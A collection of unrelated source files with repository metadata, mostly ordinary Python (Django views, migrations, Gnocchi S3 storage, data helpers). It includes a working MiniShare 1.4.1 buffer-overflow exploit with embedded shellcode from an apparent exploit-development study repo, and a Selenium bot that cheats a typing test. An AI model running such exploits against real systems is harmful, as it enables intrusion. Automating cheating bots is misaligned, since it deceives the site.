dosya.write(str(f))
# Helpers for the correlation-based goodness-of-fit measure.
def ortalamaBul(veriler):
    """Return the arithmetic mean of *veriler*.

    BUG FIX: the original returned the raw sum (``return toplam``),
    leaving the ``toplam/len(veriler)`` mean computation as unreachable
    dead code after the first return; the function name and its callers
    (standart / korelasyonBul) expect a mean.
    """
    if not veriler:
        raise ValueError("ortalamaBul: empty input")
    return sum(veriler) / len(veriler)
def standart(veriler):
    # NOTE(review): apparently meant as a spread / standard-deviation-like
    # helper, but it sums (i - mean) ** 0.5 over the *indices* i rather
    # than the data values, and uses exponent 0.5 (square root) where a
    # deviation measure would square — a negative difference here yields
    # a complex number.  It also recomputes ortalamaBul(veriler) on every
    # iteration (O(n^2)).  Confirm the intended formula before relying
    # on this value.
    sd = 0
    for i in range(0, len(veriler)):
        sd += (i - ortalamaBul(veriler)) ** 0.5
    return sd
def korelasyonBul(veriler):
    # NOTE(review): ``St`` is not defined anywhere in this file, so this
    # function raises NameError when called.  The expression resembles
    # the correlation coefficient r = sqrt((St - Sr) / St); a total-sum-
    # of-squares helper named St appears to be missing — confirm.
    return ((abs((St(veriler) - standart(veriler))) / St(veriler))) ** (1 / 2)
# Question 2: correlation value for each polynomial degree, then the
# best (largest) one.  NOTE(review): korelasyonBul references an
# undefined name ``St`` and raises NameError when executed — see the
# note on that function.
aa = korelasyonBul(a)
dosya.write("\nİKİNCİ SORUNUN CEVABI\n")
dosya.write("1.derece korelasyon yaklaşımı" + str(aa) + "\n")
bb = korelasyonBul(b)
dosya.write("2.derece korelasyon yaklaşımı" + str(bb) + "\n")
cc = korelasyonBul(c)
dosya.write("3.derce korelasyon yaklaşımı" + str(cc) + "\n")
dd = korelasyonBul(d)
dosya.write("4.derece korelasyon yaklaşımı" + str(dd) + "\n")
ee = korelasyonBul(e)
dosya.write("5.derece korelasyon yaklaşımı" + str(ee) + "\n")
ff = korelasyonBul(f)
dosya.write("6.derece korelasyon yaklaşımı" + str(ff) + "\n")
# Most suitable polynomial = the largest correlation value.
uyumlu = [aa, bb, cc, dd, ee, ff]
enyakın = max(uyumlu)
dosya.write("en uyumlu polinom:" + str(enyakın) + "\n")
if enyakın == aa:
    dosya.write("1.derece")
if enyakın == bb:
    dosya.write("2.derece")
if enyakın == cc:
    dosya.write("3.derece")
if enyakın == dd:
    dosya.write("4.derece")
if enyakın == ee:
    dosya.write("5.derece")
if enyakın == ff:  # BUG FIX: the original tested ``enyakın == ee`` twice
    dosya.write("6.derece")
dosya.write("\nÜÇÜNCÜ SORU\n")
# Question 3: process the case counts in consecutive groups of ten.
bas = 0
son = 10
while son < len(vaka_liste):
    xx = vaka_liste[bas:son]
    bas += 10
    son += 10
    # Correlation for this ten-element group.
    onlugrupk = korelasyonBul(xx)
    dosya.write("korelasyon değeri onlu grup")
    dosya.write(str(onlugrupk))
    enuyumluk = [onlugrupk]
    enuyumlupolonlu = max(enuyumluk)
    dosya.write("onlu grubun en uyumlu pol=" + str(enuyumlupolonlu))
    # Polynomial fits of degree 1..6 for this group.
    # BUG FIX: every branch of the original called make_matrix(1, xx),
    # so the lines labelled "2.derece" .. "6.derece" all reported the
    # degree-1 fit; each degree is now actually fitted.  The one-shot
    # ``for j/k in range(1)`` wrappers were removed (single iteration).
    for derece in range(1, 7):
        onlugrupp = gauss(make_matrix(derece, xx))
        dosya.write("%d.derece polinom onlu grup" % derece)
        dosya.write(str(onlugrupp))
dosya.close()
| 26.759657
| 70
| 0.584122
|
c4ea02b537c50c502dd2c4a091aae580aa390440
| 1,296
|
py
|
Python
|
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | null | null | null |
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | 7
|
2020-02-12T00:23:53.000Z
|
2022-02-10T08:12:31.000Z
|
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | null | null | null |
from django.shortcuts import render, redirect
from django.contrib.auth import login, authenticate
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.db import transaction
# Create your views here.
from catalog.forms import SignUpForm
from django.http import HttpResponseRedirect
from django.shortcuts import render
def first(req):
    """Render the landing page."""
    return render(req, 'index.html')
def index(req):
    """Render the index page (same template as the landing view)."""
    return render(req, 'index.html')
def profile(request):
    """Render the profile page for the currently authenticated user."""
    return render(request, 'profile.html', {'user': request.user})
def signup(request):
    """Register a new user, log them in, and redirect to /test.

    BUG FIX: the POST branch validated a plain ``UserCreationForm``
    while the GET branch rendered ``SignUpForm`` (imported above), so
    any extra SignUpForm fields were silently ignored and an invalid
    POST re-rendered the wrong form.  Both paths now use SignUpForm;
    an invalid POST falls through and re-renders the bound form so its
    errors are shown.
    """
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            raw_password = form.cleaned_data.get('password1')
            user = authenticate(username=username, password=raw_password)
            login(request, user)
            return redirect('/test')
    else:
        form = SignUpForm()
    return render(request, 'signup.html', {'form': form})
def test(request):
    """Render the test page (post-signup landing target)."""
    return render(request, 'test.html')
def welcome(request):
    """Render the welcome page (same template as the test view)."""
    return render(request, 'test.html')
| 24.923077
| 73
| 0.693673
|
a6350ea070d70e78d815948736fb093a4bc08e33
| 319
|
py
|
Python
|
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | 1
|
2022-01-04T11:07:56.000Z
|
2022-01-04T11:07:56.000Z
|
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | null | null | null |
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""Check status"""
import requests
def status():
    """status"""
    # Fetch the status page once and report its body type and content.
    reply = requests.get("https://intranet.hbtn.io/status")
    body = reply.text
    print("Body response:")
    print("\t- type: {}".format(type(body)))
    print("\t- content: {}".format(body))
# Run only when executed as a script, not on import (checker requirement).
if __name__ == "__main__":
    status()
| 19.9375
| 60
| 0.611285
|
b5e674c79ccd1235247c8c8f52bac57c6c3e8be1
| 507
|
py
|
Python
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | 1
|
2021-05-16T03:20:23.000Z
|
2021-05-16T03:20:23.000Z
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | 4
|
2021-03-30T14:06:09.000Z
|
2021-09-22T19:26:31.000Z
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-21 02:06
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 3.0.7: moves the free-text ``definition``
    # field off the Card model and onto MultiCard.

    dependencies = [
        ('Cards', '0005_auto_20200620_2253'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='card',
            name='definition',
        ),
        migrations.AddField(
            model_name='multicard',
            name='definition',
            field=models.CharField(blank=True, max_length=400),
        ),
    ]
| 22.043478
| 63
| 0.577909
|
81417d1e31331bc5e1fd6e80ece00533191fd73c
| 1,302
|
py
|
Python
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ML
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 6
|
2019-02-11T15:38:40.000Z
|
2020-10-16T19:26:51.000Z
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ML
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 65
|
2019-02-19T19:17:15.000Z
|
2020-03-09T18:01:09.000Z
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ExperimentGen
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 2
|
2020-05-30T15:29:34.000Z
|
2021-05-16T04:20:26.000Z
|
import pandas as pd
def augdescriptors(inchikeys, rxndict, erdfrows):
    """Join the inchikey-based descriptor table onto *inchikeys* and
    append constant reaction-condition columns (one value repeated for
    all *erdfrows* rows, taken from *rxndict*).
    """
    # Bring in the inchi-key based features for the merge.
    with open('perov_desc.csv', 'r') as my_descriptors:
        descriptor_df = pd.read_csv(my_descriptors)
    descriptor_df = inchikeys.merge(descriptor_df,
                                    left_on='_rxn_organic-inchikey',
                                    right_on='_raw_inchikey',
                                    how='inner')
    # Keep every merged column (copy), then drop the join key.
    descriptor_df = descriptor_df[[c for c in descriptor_df.columns]]
    descriptor_df.drop(columns=['_rxn_organic-inchikey'], inplace=True)
    # Constant per-run condition columns, in the original output order.
    # (Key spellings 'duratation_*' match rxndict as produced upstream.)
    const_cols = pd.DataFrame({
        '_rxn_mixingtime1S': [rxndict['duratation_stir1']] * erdfrows,
        '_rxn_mixingtime2S': [rxndict['duratation_stir2']] * erdfrows,
        '_rxn_reactiontimeS': [rxndict['duration_reaction']] * erdfrows,
        '_rxn_stirrateRPM': [rxndict['stirrate']] * erdfrows,
        '_rxn_temperatureC': [rxndict['temperature2_nominal']] * erdfrows,
    })
    return pd.concat([inchikeys, const_cols, descriptor_df], axis=1)
| 54.25
| 120
| 0.718126
|
5d94dbb3398db3f07d235660aec6aa501dbdaa39
| 1,588
|
py
|
Python
|
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
=Selenium helper functions=
Use this functions to start and stop the Selenium server in every other module.
"""
from selenium import webdriver
import selenium.webdriver.chrome.service as service
"""
Path where the Selenium driver for your browser is saved.
Go to http://selenium-python.readthedocs.io/installation.html to search for the
appropiate driver, copy it to the directory where this script is saved,
and change 'chromedriver' to match the name of your driver.
"""
PATH_TO_DRIVER = './chromedriver'
"""
Path where your web browser application is saved. This example is for MacOs, in Windows 7, 8,
and 10, the path might be ‘C:\Program Files\Google\Chrome\Application’. Search Google if
you don't know how to find your browser application's path.
"""
PATH_TO_BROWSER = '/Applications/Google Chrome.app'
"""
Whoscored URL
"""
WHOSCORED_URL = 'https://www.whoscored.com'
"""
Functions
"""
def start_server_and_driver():
    """
    Start the Selenium server and driver and return them as objects.
    """
    selenium_server = service.Service(PATH_TO_DRIVER)
    selenium_server.start()
    # Point the remote driver at the freshly started local server.
    browser_caps = {'chrome.binary': PATH_TO_BROWSER}
    remote_driver = webdriver.Remote(selenium_server.service_url,
                                     browser_caps)
    return selenium_server, remote_driver
def stop_server_and_driver(server, driver):
    """
    Close the driver and then stop the server.

    =Args=
    driver: driver object returned by def start_server_and_driver()
    server: server object returned by def start_server_and_driver()
    """
    # Order matters: the driver session must be closed before its server.
    driver.close()
    server.stop()
| 28.872727
| 93
| 0.723552
|
5c75e57fef0e14bf4799f0b71fbfbf0ae4f8d1c9
| 9,465
|
py
|
Python
|
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2016-2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
import tenacity
from gnocchi import carbonara
from gnocchi.common import s3
from gnocchi import storage
from gnocchi import utils
boto3 = s3.boto3
botocore = s3.botocore
# Configuration options for the S3 storage driver.  Credentials and
# region default to the standard AWS_* environment variables.
OPTS = [
    cfg.StrOpt('s3_endpoint_url',
               help='S3 endpoint URL'),
    cfg.StrOpt('s3_region_name',
               default=os.getenv("AWS_DEFAULT_REGION"),
               help='S3 region name'),
    cfg.StrOpt('s3_access_key_id',
               default=os.getenv("AWS_ACCESS_KEY_ID"),
               help='S3 access key id'),
    cfg.StrOpt('s3_secret_access_key',
               default=os.getenv("AWS_SECRET_ACCESS_KEY"),
               help='S3 secret access key'),
    cfg.StrOpt('s3_bucket_prefix',
               # Max bucket length is 63 and we use "-" as separator
               # 63 - 1 - len(uuid) = 26
               max_length=26,
               default='gnocchi',
               help='Prefix to namespace metric bucket.'),
    cfg.FloatOpt('s3_check_consistency_timeout',
                 min=0,
                 default=60,
                 help="Maximum time to wait checking data consistency when "
                      "writing to S3. Set to 0 to disable data consistency "
                      "validation."),
    cfg.IntOpt('s3_max_pool_connections',
               min=1,
               default=50,
               help="The maximum number of connections to keep in a "
                    "connection pool."),
]
def retry_if_operationaborted(exception):
    """Tenacity predicate: True for S3 "OperationAborted" client errors."""
    if not isinstance(exception, botocore.exceptions.ClientError):
        return False
    return exception.response['Error'].get('Code') == "OperationAborted"
class S3Storage(storage.StorageDriver):
    """Carbonara storage driver keeping aggregate splits in one S3 bucket.

    Objects are keyed as
    ``<metric id>/<aggregation>_<granularity seconds>_<split key>_v<version>``
    (see _prefix and _object_name) inside the ``<prefix>-aggregates`` bucket.
    """

    # This driver always rewrites whole split objects (no partial writes).
    WRITE_FULL = True
    # Backoff schedule used while polling for read-after-write consistency.
    _consistency_wait = tenacity.wait_exponential(multiplier=0.1)

    def __init__(self, conf):
        super(S3Storage, self).__init__(conf)
        self.s3, self._region_name, self._bucket_prefix = (
            s3.get_connection(conf)
        )
        self._bucket_name = '%s-aggregates' % self._bucket_prefix
        # A timeout of 0 disables consistency checking entirely.
        if conf.s3_check_consistency_timeout > 0:
            self._consistency_stop = tenacity.stop_after_delay(
                conf.s3_check_consistency_timeout)
        else:
            self._consistency_stop = None

    def __str__(self):
        return "%s: %s" % (self.__class__.__name__, self._bucket_name)

    def upgrade(self):
        # Create the aggregates bucket; tolerate it already existing.
        super(S3Storage, self).upgrade()
        try:
            s3.create_bucket(self.s3, self._bucket_name, self._region_name)
        except botocore.exceptions.ClientError as e:
            if e.response['Error'].get('Code') != "BucketAlreadyExists":
                raise

    @staticmethod
    def _object_name(split_key, aggregation, version=3):
        # "<aggregation>_<granularity seconds>_<split key>[_v<version>]"
        name = '%s_%s_%s' % (
            aggregation,
            utils.timespan_total_seconds(split_key.sampling),
            split_key,
        )
        return name + '_v%s' % version if version else name

    @staticmethod
    def _prefix(metric):
        # All of a metric's objects live under "<metric id>/".
        return str(metric.id) + '/'

    def _put_object_safe(self, Bucket, Key, Body):
        # PUT the object, then (when consistency checking is enabled)
        # HEAD it with IfMatch on the returned ETag until S3 serves the
        # freshly written object, bounded by _consistency_stop.
        put = self.s3.put_object(Bucket=Bucket, Key=Key, Body=Body)
        if self._consistency_stop:

            def _head():
                return self.s3.head_object(Bucket=Bucket,
                                           Key=Key, IfMatch=put['ETag'])

            tenacity.Retrying(
                retry=tenacity.retry_if_result(
                    lambda r: r['ETag'] != put['ETag']),
                wait=self._consistency_wait,
                stop=self._consistency_stop)(_head)

    def _store_metric_splits(self, metric, keys_aggregations_data_offset,
                             version=3):
        # WRITE_FULL driver: offset is ignored, whole objects are written.
        for key, aggregation, data, offset in keys_aggregations_data_offset:
            self._put_object_safe(
                Bucket=self._bucket_name,
                Key=self._prefix(metric) + self._object_name(
                    key, aggregation.method, version),
                Body=data)

    def _delete_metric_splits_unbatched(self, metric, key, aggregation,
                                        version=3):
        # Delete a single split object for this metric.
        self.s3.delete_object(
            Bucket=self._bucket_name,
            Key=self._prefix(metric) + self._object_name(
                key, aggregation.method, version))

    def _delete_metric(self, metric):
        # List and bulk-delete every object under the metric's prefix,
        # following list_objects_v2 continuation tokens.
        bucket = self._bucket_name
        response = {}
        while response.get('IsTruncated', True):
            if 'NextContinuationToken' in response:
                kwargs = {
                    'ContinuationToken': response['NextContinuationToken']
                }
            else:
                kwargs = {}
            try:
                response = self.s3.list_objects_v2(
                    Bucket=bucket, Prefix=self._prefix(metric), **kwargs)
            except botocore.exceptions.ClientError as e:
                if e.response['Error'].get('Code') == "NoSuchKey":
                    # Maybe it never has been created (no measure)
                    return
                raise
            s3.bulk_delete(self.s3, bucket,
                           [c['Key'] for c in response.get('Contents', ())])

    def _get_measures_unbatched(self, metric, key, aggregation, version=3):
        # Return the raw bytes of one split, or None when it is missing.
        try:
            response = self.s3.get_object(
                Bucket=self._bucket_name,
                Key=self._prefix(metric) + self._object_name(
                    key, aggregation.method, version))
        except botocore.exceptions.ClientError as e:
            if e.response['Error'].get('Code') == 'NoSuchKey':
                return
            raise
        return response['Body'].read()

    def _metric_exists_p(self, metric, version):
        # A metric exists iff its unaggregated ("none") object does.
        unaggkey = self._build_unaggregated_timeserie_path(metric, version)
        try:
            self.s3.head_object(Bucket=self._bucket_name, Key=unaggkey)
        except botocore.exceptions.ClientError as e:
            if e.response['Error'].get('Code') == "404":
                return False
            raise
        return True

    def _list_split_keys(self, metric, aggregations, version=3):
        # Map each aggregation to the set of SplitKeys stored for it,
        # by listing objects under "<metric>/<method>_<granularity>".
        bucket = self._bucket_name
        keys = {}
        for aggregation in aggregations:
            keys[aggregation] = set()
            response = {}
            while response.get('IsTruncated', True):
                if 'NextContinuationToken' in response:
                    kwargs = {
                        'ContinuationToken': response['NextContinuationToken']
                    }
                else:
                    kwargs = {}
                response = self.s3.list_objects_v2(
                    Bucket=bucket,
                    Prefix=self._prefix(metric) + '%s_%s' % (
                        aggregation.method,
                        utils.timespan_total_seconds(
                            aggregation.granularity),
                    ),
                    **kwargs)
                # If response is empty then check that the metric exists
                contents = response.get('Contents', ())
                if not contents and not self._metric_exists_p(metric, version):
                    raise storage.MetricDoesNotExist(metric)
                for f in contents:
                    try:
                        if (self._version_check(f['Key'], version)):
                            # Key layout: <method>_<granularity>_<timestamp>…
                            meta = f['Key'].split('_')
                            keys[aggregation].add(carbonara.SplitKey(
                                utils.to_timestamp(meta[2]),
                                sampling=aggregation.granularity))
                    except (ValueError, IndexError):
                        # Might be "none", or any other file. Be resilient.
                        continue
        return keys

    @staticmethod
    def _build_unaggregated_timeserie_path(metric, version):
        # Path of the raw ("none") timeseries object for this metric.
        return S3Storage._prefix(metric) + 'none' + ("_v%s" % version
                                                     if version else "")

    def _get_or_create_unaggregated_timeseries_unbatched(
            self, metric, version=3):
        # Fetch the raw timeseries; when missing, create an empty object
        # and fall through returning None (implicitly).
        key = self._build_unaggregated_timeserie_path(metric, version)
        try:
            response = self.s3.get_object(
                Bucket=self._bucket_name, Key=key)
        except botocore.exceptions.ClientError as e:
            if e.response['Error'].get('Code') == "NoSuchKey":
                # Create the metric with empty data
                self._put_object_safe(
                    Bucket=self._bucket_name, Key=key, Body="")
            else:
                raise
        else:
            return response['Body'].read() or None

    def _store_unaggregated_timeseries_unbatched(
            self, metric, data, version=3):
        # Overwrite the raw ("none") timeseries object with *data*.
        self._put_object_safe(
            Bucket=self._bucket_name,
            Key=self._build_unaggregated_timeserie_path(metric, version),
            Body=data)
| 38.47561
| 79
| 0.564712
|
2bc97e01552e25cd34d90d4d8e3edf9643adc550
| 3,208
|
py
|
Python
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 2
|
2019-06-01T11:21:37.000Z
|
2019-11-18T22:55:39.000Z
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 2
|
2020-02-24T15:04:43.000Z
|
2021-03-07T13:44:21.000Z
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 1
|
2021-03-03T19:27:33.000Z
|
2021-03-03T19:27:33.000Z
|
# XParams
from collections import OrderedDict as odict
from runner.tools import DataFrame
from runner.resample import Resampler, RESAMPLING_METHOD, NEFF_BOUNDS
# Ensemble parameters
# NOTE: this XParams class could well be in another module and be simply imported,
# but for now it makes one module less...
class XParams(DataFrame):
    """Ensemble of experiment parameters: one row per parameter set,
    one column per parameter name, plus an optional default set.
    """
    def __init__(self, values, names, default=None):
        self.values = values
        self.names = names
        self.default = default

    def pset_as_array(self, i=None):
        """Return parameter set *i* (or the default set when i is None)
        as a plain python list (numpy rows are converted via tolist)."""
        chosen = self.default if i is None else self.values[i]
        if hasattr(chosen, 'tolist'):
            chosen = chosen.tolist()  # numpy array -> list
        return chosen

    def pset_as_dict(self, i=None):
        """Return parameter set *i* (or the default set) as an
        OrderedDict mapping parameter name to value."""
        row = self.pset_as_array(i)
        if row is None:
            # No default parameters were provided.
            return odict()
        return odict(zip(self.names, row))

    def resample(self, weights, size=None, seed=None, method=RESAMPLING_METHOD,
                 iis=False, epsilon=None, neff_bounds=NEFF_BOUNDS, bounds=None):
        """Weighted resampling of the ensemble.

        Parameters
        ----------
        weights : array of weights (must match params' size)
        size : new ensemble size, by default same as current
        seed : random state seed (None)
        method : weighted-resampling method (see runner.resample.Resampler)
        iis : Iterative Importance Sampling step (Hannan and Hargreave):
            weights are flattened with the *epsilon* exponent and jitter
            (a fraction epsilon of the weighted covariance) is added to
            the resampled ensemble; in the linear case this equals one
            resampling with full weights.
        epsilon : weight-flattening exponent [iis only]; when omitted it
            is chosen so the effective ensemble size falls in *neff_bounds*
        neff_bounds : target effective-ensemble-size range for the
            automatic epsilon choice
        bounds : authorized parameter range (experimental) — jittered
            values outside it are re-drawn a number of times [iis only]

        Returns
        -------
        XParams instance
        """
        if weights.size != self.size:
            raise ValueError("params and weights size do not match")
        sampler = Resampler(weights)  # default size implied by weights
        if iis:
            new_values = sampler.iis(self.values,
                                     size=size, seed=seed, method=method,
                                     bounds=bounds, neff_bounds=neff_bounds,
                                     epsilon=epsilon)
        else:
            indices = sampler.sample(size=size, seed=seed, method=method)
            new_values = self.values[indices]
        return XParams(new_values, self.names)
| 40.1
| 96
| 0.63217
|
e7ffdc34a6d02c394ea6b443de8050d6818a5617
| 1,394
|
py
|
Python
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
mostwantedduck/osed-1
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 28
|
2021-05-31T13:41:12.000Z
|
2022-03-29T06:19:18.000Z
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | null | null | null |
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 15
|
2021-05-28T07:39:34.000Z
|
2022-03-09T19:09:28.000Z
|
#!/usr/bin/env python3
from pwn import *
# Padding up to the saved return address on the stack.
pad = b'A' * 1787
# 0x74ff6c28: jmp esp;
# NOTE(review): the base used below (0x75860000) differs from the
# address in the comment above — presumably a rebased module on the
# target; confirm against the actual process layout.
ret = p32(0x75860000 + 0x6c28)
# NOP sled so the jmp-esp landing point slides into the shellcode.
nop = b'\x90' * 64
# msfvenom -p windows/exec -b '\x00\x0d' -f py CMD=calc.exe
buf = b""
buf += b"\xba\x87\x2d\x18\x37\xda\xc2\xd9\x74\x24\xf4\x5f\x33"
buf += b"\xc9\xb1\x31\x31\x57\x13\x03\x57\x13\x83\xc7\x83\xcf"
buf += b"\xed\xcb\x63\x8d\x0e\x34\x73\xf2\x87\xd1\x42\x32\xf3"
buf += b"\x92\xf4\x82\x77\xf6\xf8\x69\xd5\xe3\x8b\x1c\xf2\x04"
buf += b"\x3c\xaa\x24\x2a\xbd\x87\x15\x2d\x3d\xda\x49\x8d\x7c"
buf += b"\x15\x9c\xcc\xb9\x48\x6d\x9c\x12\x06\xc0\x31\x17\x52"
buf += b"\xd9\xba\x6b\x72\x59\x5e\x3b\x75\x48\xf1\x30\x2c\x4a"
buf += b"\xf3\x95\x44\xc3\xeb\xfa\x61\x9d\x80\xc8\x1e\x1c\x41"
buf += b"\x01\xde\xb3\xac\xae\x2d\xcd\xe9\x08\xce\xb8\x03\x6b"
buf += b"\x73\xbb\xd7\x16\xaf\x4e\xcc\xb0\x24\xe8\x28\x41\xe8"
buf += b"\x6f\xba\x4d\x45\xfb\xe4\x51\x58\x28\x9f\x6d\xd1\xcf"
buf += b"\x70\xe4\xa1\xeb\x54\xad\x72\x95\xcd\x0b\xd4\xaa\x0e"
buf += b"\xf4\x89\x0e\x44\x18\xdd\x22\x07\x76\x20\xb0\x3d\x34"
buf += b"\x22\xca\x3d\x68\x4b\xfb\xb6\xe7\x0c\x04\x1d\x4c\xe2"
buf += b"\x4e\x3c\xe4\x6b\x17\xd4\xb5\xf1\xa8\x02\xf9\x0f\x2b"
buf += b"\xa7\x81\xeb\x33\xc2\x84\xb0\xf3\x3e\xf4\xa9\x91\x40"
buf += b"\xab\xca\xb3\x22\x2a\x59\x5f\x8b\xc9\xd9\xfa\xd3"
# Final request: padding | jmp-esp address | NOP sled | shellcode.
payload = pad + ret + nop + buf
r = remote('192.168.122.187', 80)
# The overflow is triggered through the GET request path.
r.write(b'GET ' + payload + b' HTTP/1.1\r\n\r\n')
| 37.675676
| 62
| 0.663558
|
776e297a1ca902ec101507d3e1aea6a6aaf64c37
| 610
|
py
|
Python
|
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated migration: re-declares the foreign keys from
    # MainSubCategory to SubCategory and from SubCategory to Category.

    dependencies = [
        ('store', '0004_inventory_listing_end_datetime'),
    ]

    operations = [
        migrations.AlterField(
            model_name='mainsubcategory',
            name='sub_category_fk',
            field=models.ForeignKey(to='store.SubCategory'),
        ),
        migrations.AlterField(
            model_name='subcategory',
            name='category_fk',
            field=models.ForeignKey(to='store.Category'),
        ),
    ]
| 24.4
| 60
| 0.606557
|
31f24bac677aad8ddb192e03c12e860a1a0bdb0b
| 954
|
py
|
Python
|
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | 3
|
2019-02-22T12:57:15.000Z
|
2021-08-07T16:27:47.000Z
|
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | null | null | null |
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | 2
|
2019-04-27T06:02:12.000Z
|
2020-12-16T14:50:41.000Z
|
from selenium import webdriver
from bs4 import BeautifulSoup
from time import sleep
# Path to the local chromedriver binary used by Selenium.
path = r'C:\Users\lenovo\Documents\Vinay Python\github\selenium drivers\chromedriver.exe'
driver = webdriver.Chrome(path)
# change these
# NOTE(review): plaintext credentials in source — move to env/config.
user = 'username'
pswd = 'password'
# Log in to 10fastfingers via its Twitter OAuth flow.
taurl = r'https://10fastfingers.com/account/twitter_login'
driver.get(taurl)
sf = driver.find_element_by_id('username_or_email')
sf.send_keys(user)
sf = driver.find_element_by_id('password')
sf.send_keys(pswd)
sf = driver.find_element_by_id('allow')
sf.click()
url = r'https://10fastfingers.com/typing-test/english'
# url = r'https://10fastfingers.com/multiplayer/alpha'
driver.get(url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
count = 0
# Type each word from the test's word row, pausing briefly every 20
# words so the injected input looks less machine-like.
for x in soup.find_all('div', attrs={'id': 'row1'}):
    sf = driver.find_element_by_id('inputfield')
    sf.send_keys(x.get_text())
    if count == 20:
        sleep(1)
        count = 0
    count += 1
| 26.5
| 90
| 0.703354
|
2a79d854f33a2ac4d17f42613b8691bf557a1308
| 396
|
py
|
Python
|
unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | null | null | null |
